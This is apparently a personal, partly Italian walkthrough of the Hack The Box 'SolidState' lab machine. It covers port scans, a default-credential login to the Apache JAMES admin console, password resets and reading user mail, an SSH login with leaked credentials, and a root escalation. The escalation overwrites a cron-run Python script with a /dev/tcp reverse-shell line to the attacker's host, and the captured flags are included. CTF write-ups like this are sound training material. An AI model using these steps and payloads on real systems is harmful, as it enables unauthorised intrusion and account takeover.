10.10.10.51


 nmap -vv -p- -T4 -n -Pn  10.10.10.51 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-15 16:44 EDT
Initiating Connect Scan at 16:44
Scanning 10.10.10.51 [65535 ports]
Discovered open port 22/tcp on 10.10.10.51
Discovered open port 110/tcp on 10.10.10.51
Discovered open port 80/tcp on 10.10.10.51
Discovered open port 25/tcp on 10.10.10.51
Discovered open port 4555/tcp on 10.10.10.51
Discovered open port 119/tcp on 10.10.10.51
Completed Connect Scan at 16:44, 14.43s elapsed (65535 total ports)
Nmap scan report for 10.10.10.51
Host is up, received user-set (0.049s latency).
Scanned at 2022-03-15 16:44:34 EDT for 15s
Not shown: 65529 closed tcp ports (conn-refused)
PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
25/tcp   open  smtp    syn-ack
80/tcp   open  http    syn-ack
110/tcp  open  pop3    syn-ack
119/tcp  open  nntp    syn-ack
4555/tcp open  rsip    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 14.50 seconds


sudo nmap -sC -sV -p22,25,80,110,119,4555 10.10.10.51
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-15 16:45 EDT
Nmap scan report for 10.10.10.51
Host is up (0.050s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp   open  smtp    JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.6 [10.10.14.6])
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp  open  pop3    JAMES pop3d 2.3.2
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
119/tcp  open  nntp    JAMES nntpd (posting ok)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
4555/tcp open  rsip?
| fingerprint-strings: 
|   GenericLines: 
|     JAMES Remote Administration Tool 2.3.2
|     Please enter your login and password
|     Login id:
|     Password:
|     Login failed for 
|_    Login id:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port4555-TCP:V=7.92%I=7%D=3/15%Time=6230FAF8%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,7C,"JAMES\x20Remote\x20Administration\x20Tool\x202\.3\.2\nPl
SF:ease\x20enter\x20your\x20login\x20and\x20password\nLogin\x20id:\nPasswo
SF:rd:\nLogin\x20failed\x20for\x20\nLogin\x20id:\n");
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 243.62 seconds








port 80:

solid state security

in about us:


webadmin@solid-state-security.com


sudo gobuster  dir -u http://10.10.10.51/ -w /usr/share/wordlists/dirb/big.txt -t 100 -x .php,.js,.txt,.htm,.html

/LICENSE.txt          (Status: 200) [Size: 17128]
/README.txt           (Status: 200) [Size: 963]  
/about.html           (Status: 200) [Size: 7183] 
/assets               (Status: 301) [Size: 311] [--> http://10.10.10.51/assets/]
/images               (Status: 301) [Size: 311] [--> http://10.10.10.51/images/]
/index.html           (Status: 200) [Size: 7776]                                
/services.html        (Status: 200) [Size: 8404]                                
/server-status        (Status: 403) [Size: 299]  






Port 4555

sulla porta 4555 c'è apache JAMES

provo a collegarmi con telnet e a usare le credenziali di default:

telnet 10.10.10.51 4555        
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.

JAMES Remote Administration Tool 2.3.2
Please enter your login and password
Login id:
Password:
root
Login failed for 
Login id:
root
Password:
toor
Login failed for root
Login id:
root
Password:
root
^[[3~Welcome root. HELP for a list of commands


si accede con root:root

quindi posso usare:


https://www.exploit-db.com/exploits/35513


visto che per farlo funzionare poi devo fare login aggiungo un utente sempre tramite telnet:

adduser miouser miapassword
User miouser added



non funziona perchè qualcuno deve accedere tramite SSH, non basta accdere a pop3



allora provo a vedere se ci sono mail utili negli inbox degli utenti:

1) oprendo la lista degli users

listusers
Existing accounts 7
user: james
user: ../../../../../../../../etc/bash_completion.d
user: thomas
user: john
user: mindy
user: miouser
user: mailadmin


cambio le password:

setpassword james password123
Password for james reset
setpassword thomas password123
Password for thomas reset
setpassword john password123
Password for john reset
setpassword mindy password123
Password for mindy reset
setpassword mailadmin password123
Password for mailadmin reset




prima mail trovata:


telnet 10.10.10.51 110                                                                                       1 ⨯
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER john
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
+OK
PASS password123
+OK Welcome john
LIST
+OK 1 743
1 743
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <9564574.1.1503422198108.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: john@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <john@localhost>;
          Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:16:20 -0400 (EDT)
From: mailadmin@localhost
Subject: New Hires access
John, 

Can you please restrict mindy's access until she gets read on to the program. Also make sure that you send her a tempory password to login to her accounts.

Thank you in advance.

Respectfully,
James

.


vado a vedere l'inbox di mindy:



telnet 10.10.10.51 110                                                                                                                                             1 ⨯
Trying 10.10.10.51...
Connected to 10.10.10.51.
Escape character is '^]'.
USER mindy
+OK solidstate POP3 server (JAMES POP3 Server 2.3.2) ready 
+OK
PASS password123
+OK Welcome mindy
LIST
+OK 2 1945
1 1109
2 836
.
RETR 1
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <5420213.0.1503422039826.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 798
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:13:42 -0400 (EDT)
From: mailadmin@localhost
Subject: Welcome

Dear Mindy,
Welcome to Solid State Security Cyber team! We are delighted you are joining us as a junior defense analyst. Your role is critical in fulfilling the mission of our orginzation. The enclosed information is designed to serve as an introduction to Cyber Security and provide resources that will help you make a smooth transition into your new role. The Cyber team is here to support your transition so, please know that you can call on any of us to assist you.

We are looking forward to you joining our team and your success at Solid State Security. 

Respectfully,
James
.
RETR 2
+OK Message follows
Return-Path: <mailadmin@localhost>
Message-ID: <16744123.2.1503422270399.JavaMail.root@solidstate>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Delivered-To: mindy@localhost
Received: from 192.168.11.142 ([192.168.11.142])
          by solidstate (JAMES SMTP Server 2.3.2) with SMTP ID 581
          for <mindy@localhost>;
          Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
Date: Tue, 22 Aug 2017 13:17:28 -0400 (EDT)
From: mailadmin@localhost
Subject: Your Access

Dear Mindy,


Here are your ssh credentials to access the system. Remember to reset your password after your first login. 
Your access is restricted at the moment, feel free to ask your supervisor to add any commands you need to your path. 

username: mindy
pass: P@55W0rd1!2@

Respectfully,
James

.


quindi posso accedere a ssh (con shell ristretta) con:

mindy:P@55W0rd1!2@


ho ottenuto la shell sia ssh (ristretta) sia la reverse shell dell'exploit di prima


nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.51] 50310
id
uid=1001(mindy) gid=1001(mindy) groups=1001(mindy)
pwd
/home/mindy
whoami
mindy


cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
usbmux:x:105:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
rtkit:x:106:110:RealtimeKit,,,:/proc:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:108:111::/var/run/dbus:/bin/false
geoclue:x:109:115::/var/lib/geoclue:/bin/false
avahi:x:110:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:111:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:112:119::/var/lib/saned:/bin/false
speech-dispatcher:x:113:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
pulse:x:114:120:PulseAudio daemon,,,:/var/run/pulse:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:122:Gnome Display Manager:/var/lib/gdm3:/bin/false
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
james:x:1000:1000:james:/home/james/:/bin/bash
mindy:x:1001:1001:mindy:/home/mindy:/bin/rbash


sudo -l
sh: 10: sudo: not found


noto che la shell che ho con ssh è ristretta mentre la reverse che ottengo no

mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ 
mindy@solidstate:~$ pwd
/home/mindy
mindy@solidstate:~$ pwd
/home/mindy
mindy@solidstate:~$ id
-rbash: id: command not found
mindy@solidstate:~$ env
-rbash: env: command not found


quindi uso la reverse 



${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
cat user.txt
0510e71c2e8c9cb333b36a38080d0dc2


sudo -l non posso farlo 

provo a trovare qualche binario con suid

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

niente

provo a trovare files di root scrivibili:

find / -writable -type  f 2>/dev/null | grep -v "/proc/"

trovo /opt/tmp.py


-rwxrwxrwx  1 root root  105 Aug 22  2017 tmp.py

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
cat tmp.py
#!/usr/bin/env python
import os
import sys
try:
     os.system('rm -r /tmp/* ')
except:
     sys.exit()


dovrebbe essere eseguito periodicamente, controllo crontab:

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )


non c'è in crontab ma forse non posso vederlo per permessi ecc

quindi provoa a mettere un file in /tmp

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ touch /tmp/prova.txt
touch /tmp/prova.txt
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -lart /tmp/
ls -lart /tmp/
total 32
drwxr-xr-x 22 root       root       4096 Apr 26  2021 ..
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .XIM-unix
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .Test-unix
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .font-unix
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .ICE-unix
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .X11-unix
-r--r--r--  1 Debian-gdm Debian-gdm   11 Mar 15 17:00 .X1024-lock
-rw-r--r--  1 mindy      mindy         0 Mar 15 17:35 prova.txt
drwxrwxrwt  7 root       root       4096 Mar 15 17:35 .


${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ ls -lart /tmp/
ls -lart /tmp/
total 32
drwxr-xr-x 22 root       root       4096 Apr 26  2021 ..
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .XIM-unix
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .Test-unix
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .font-unix
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .ICE-unix
drwxrwxrwt  2 root       root       4096 Mar 15 17:00 .X11-unix
-r--r--r--  1 Debian-gdm Debian-gdm   11 Mar 15 17:00 .X1024-lock
drwxrwxrwt  7 root       root       4096 Mar 15 17:36 .
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ 


questo conferma che viene eseguito regolarmente


echo "__import__('os').system('bash -i >& /dev/tcp/10.10.14.6/80 0>&1')" > tmp.py

${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ cat tmp.py
cat tmp.py
__import__('os').system('bash -i >& /dev/tcp/10.10.14.6/80 0>&1')
${debian_chroot:+($debian_chroot)}mindy@solidstate:/opt$ 



ottengo facilmente reverse shell:

nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.51] 32772
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# 

# cat root.txt
4f4afb55463c3bc79ab1e906b074953d
